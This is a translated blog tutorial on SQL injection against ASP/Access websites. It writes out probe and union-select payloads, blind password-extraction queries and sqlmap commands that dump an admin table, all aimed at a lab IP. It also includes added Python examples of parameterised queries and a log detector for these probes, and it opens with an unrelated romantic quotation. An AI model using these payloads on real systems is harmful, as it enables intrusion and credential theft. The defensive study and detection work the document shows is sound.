Tutorial study notes (1): 07, database vulnerabilities (Access injection)

Qian Zhongshu wrote in "Fortress Besieged": "About seeing you: it makes the few days before and after a meeting bathed in light, good days." Yes, as long as I can see you, my mood is jubilant; it has been this way for a long time. A feeling like this has, in principle, arrived, but I am happy that you have your plan and I have my purpose, because I like you, and I do want to tell you everything together...

I. Categories

1. Static pages

htm or html static pages; the server parses no script.

Features: no dependence on a database; inflexible; production, updating and maintenance are troublesome; poor interactivity; limited functionality; secure: no database injection vulnerability exists.

2. Dynamic pages

asp / aspx / php / jsp and the like, interpreted and executed by the corresponding script engine.

Features: backed by a database; good flexibility; good interactivity; insecure: database injection vulnerabilities exist.

II. Site access flow
(Figure omitted: site access flow diagram.)

III. Causes of the vulnerability

Target URL: www.aiyou.com/new.php?id=23

1. Normal flow: the site returns the news item with id 23 from the database.

2. The parameter value 23 is replaced with another SQL statement.

3. The site does not check this instruction.

4. The server executes the new statement and returns the result to the site.

5. Based on the returned information, the client can proceed with further injection.
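The five steps above come down to one coding mistake: the query-string value is pasted into the SQL text. The following Python is an added example, not code from the original notes. It uses sqlite3 as a stand-in for the Access/ASP stack (an assumption, since the standard library has no Access driver) with a constructed news table, and shows the vulnerable lookup next to a hardened one that validates the id and binds it as a parameter.

```python
"""Added example (not from the original notes): the 'id=23' lookup described
above, written the vulnerable way (string concatenation) and the safe way
(input validation plus a parameterised query).  sqlite3 stands in for the
Access/ASP stack; the table and rows are constructed sample data."""
import re
import sqlite3


def make_db():
    """Build an in-memory database with a constructed 'news' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(22, "Item 22"), (23, "Item 23"), (24, "Item 24")],
    )
    return conn


def vulnerable_lookup(conn, id_param):
    """Steps 2-4 above: the raw query-string value becomes part of the SQL,
    so 'id=23 or 1=1' changes the WHERE clause instead of being a value."""
    sql = "SELECT id, title FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def safe_lookup(conn, id_param):
    """Hardened version: reject anything that is not a plain integer before
    it reaches SQL, then bind the value as a parameter so it can only ever
    be data, never SQL syntax."""
    if not re.fullmatch(r"[0-9]+", id_param):
        raise ValueError("id must be a positive integer")
    return conn.execute(
        "SELECT id, title FROM news WHERE id=?", (int(id_param),)
    ).fetchall()


def is_rejected(conn, id_param):
    """True when the hardened lookup refuses the input (step 3 done right)."""
    try:
        safe_lookup(conn, id_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("normal   :", vulnerable_lookup(db, "23"))        # one row
    print("injected :", vulnerable_lookup(db, "23 or 1=1")) # every row leaks
    print("hardened :", safe_lookup(db, "23"))              # one row
    print("rejected :", is_rejected(db, "23 or 1=1"))       # True
```

In classic ASP the same hardening is done with an ADODB.Command whose Parameters collection carries the id (CreateParameter followed by Parameters.Append), so the value is never spliced into the SQL string; the integer check still belongs before the query.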

IV. Harms of SQL injection

1. Database information disclosure

2. Pages tampered with

3. Pages planted with Trojans (drive-by download)

4. Malicious operations performed on the database

5. Server remotely controlled

6. Hard disk data destroyed

V. The Access database

Usually paired with ASP scripts; the stored data cannot exceed 100M; there is only one database name, inside which multiple tables can be created.

1. Database file suffix: *.mdb

2. ASP connecting to an Access database

<%
' Connect to an Access (.mdb) file through the Jet OLE DB provider
Dim conn, connstr, db
db = "Your.mdb"
Set conn = Server.CreateObject("ADODB.Connection")
connstr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
conn.Open connstr
%>

3. Common tool for opening .mdb files: EasyAccess

4. Judging whether the vulnerability exists

Target: http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513

Analysing the injection point:

http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513/ returns an error, so injection may be possible.

http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1 returns normally.

http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2 returns an error: injection exists.

http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select * from msysobjects)>0 identifies an Access database: the error says there is no read permission on msysobjects, which means that table exists, and from that we know it is an Access database.

5. Querying the tables in the Access database

http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select * from user) returns an error, so there is no user table.

http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select * from admin) returns normally, so the admin table exists.

6. Determining column names

http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select password from admin) returns normally, so the column password exists.

Common username column names: name username user_name admin adminuser admin_user admin_username adminname

Common password column names: password pass userpass user_pass pwd userpwd adminpwd admin_pwd

7. Determining the number of columns in the table

http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 returns normally, meaning there are 22 columns; if it does not return normally, keep changing the number.

8. Union query

http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin: the admin table has 22 columns in total, so the union query must list 1 to 22; the page only displays positions 3 and 15, and those two positions can be replaced to retrieve the desired values.

VI. Another method of judging:

1. http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and (select len(password) from admin)=16 determines the length of the password; a normal return means the password length is 16.

2. http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,1,1)) from admin)=97 determines the first character of the password; a normal return means the first character is "a" (ASCII 97).

Then determine the second character; after each success, change the value and determine the remaining characters in turn.
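Every probe in sections V and VI leaves a distinctive query string in the web server log, which is the defender's side of the same procedure. The following Python is an added example, not part of the original notes: it parses constructed IIS W3C log lines (the field selection "date time c-ip cs-method cs-uri-stem cs-uri-query sc-status" is an assumption about the site's logging configuration), URL-decodes the query, matches it against the probe patterns shown on this page, and then counts flagged requests per client and page, since the step-by-step probing above produces a burst of hits that a single match does not.

```python
"""Added example (not part of the original notes): flag the Access-injection
probes from sections V and VI in IIS W3C log lines.  The log lines are
constructed sample data; the field layout is an assumed logging configuration."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Rule name -> pattern applied to the decoded, lower-cased query string.
# Each pattern corresponds to a probe shown on this page.
RULES = {
    "tautology":          re.compile(r"\band\s+1\s*=\s*[12]\b"),      # and 1=1 / and 1=2
    "exists_probe":       re.compile(r"\bexists\s*\(\s*select\b"),     # table/column guessing
    "access_fingerprint": re.compile(r"\bmsysobjects\b"),              # Access system table
    "order_by_count":     re.compile(r"\border\s+by\s+\d+\b"),         # column counting
    "union_select":       re.compile(r"\bunion\s+select\b"),           # union query
    "blind_char":         re.compile(r"\b(len|asc|mid)\s*\("),         # len()/asc(mid()) guessing
}

# Constructed sample log: one client walking through the probes, one normal client.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2020-02-19 10:01:02 192.168.21.50 GET /Production/PRODUCT_DETAIL.asp id=1513 200
2020-02-19 10:01:09 192.168.21.50 GET /Production/PRODUCT_DETAIL.asp id=1513+and+1=1 200
2020-02-19 10:01:11 192.168.21.50 GET /Production/PRODUCT_DETAIL.asp id=1513+and+1=2 500
2020-02-19 10:01:20 192.168.21.50 GET /Production/PRODUCT_DETAIL.asp id=1513%20and%20exists(select%20*%20from%20msysobjects)%3E0 500
2020-02-19 10:02:05 192.168.21.50 GET /Production/PRODUCT_DETAIL.asp id=1513%20order%20by%2022 200
2020-02-19 10:02:30 192.168.21.50 GET /Production/PRODUCT_DETAIL.asp id=1513%20union%20select%201,2,3%20from%20admin 200
2020-02-19 10:03:00 192.168.21.50 GET /Production/PRODUCT_DETAIL.asp id=1513%20and%20(select%20top%201%20asc(mid(admin,1,1))%20from%20admin)=97 200
2020-02-19 10:03:10 192.168.21.77 GET /Production/PRODUCT_DETAIL.asp id=1520 200
2020-02-19 10:03:15 192.168.21.77 GET /index.asp - 200
"""


def parse_line(line):
    """Split one W3C line into a dict; None for blank or '#' directive lines."""
    if not line.strip() or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) < 7:
        return None
    _date, _time, ip, method, stem, query, status = fields[:7]
    # Decode first: '+' and '%20' hide the spaces, '%3E' hides the '>'.
    return {"ip": ip, "method": method, "stem": stem,
            "query": "" if query == "-" else unquote_plus(query),
            "status": int(status)}


def match_rules(query):
    """Names of every rule that fires on a decoded query string."""
    q = query.lower()
    return [name for name, pat in RULES.items() if pat.search(q)]


def scan_log(text):
    """One hit per flagged request: (ip, stem, decoded query, rule names)."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rules = match_rules(rec["query"])
        if rules:
            hits.append((rec["ip"], rec["stem"], rec["query"], rules))
    return hits


def probing_clients(text, threshold=3):
    """(ip, page) pairs with at least `threshold` flagged requests: the
    step-by-step probing above yields many hits in a short window, which is
    a stronger signal than any single pattern match."""
    counts = defaultdict(int)
    for ip, stem, _query, _rules in scan_log(text):
        counts[(ip, stem)] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, stem, query, rules in scan_log(SAMPLE_LOG):
        print(ip, stem, rules, "<-", query)
    print(probing_clients(SAMPLE_LOG))
```

Decode before matching: in the log the spaces arrive as + or %20 and > as %3E, so a pattern applied to the raw field misses most of these probes. The rule list covers only the hand-written probes on this page; sqlmap (section VII) uses its own payloads, so pair this with the weaker but more general signal of one client alternating 200 and 500 responses on the same page, which the status field in the parsed records makes available.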

VII. Using the sqlmap tool

Target address: http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513

1. Test whether the vulnerability exists

sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513"

2. Get table names

sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" --tables

3. Get column names

sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" --columns -T admin

4. Dump the contents of the specified columns

sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" -T admin -C admin,password --dump

Illegal use is prohibited.
Welcome to follow the official account: web security tool library


Source: blog.csdn.net/weixin_41489908/article/details/104382554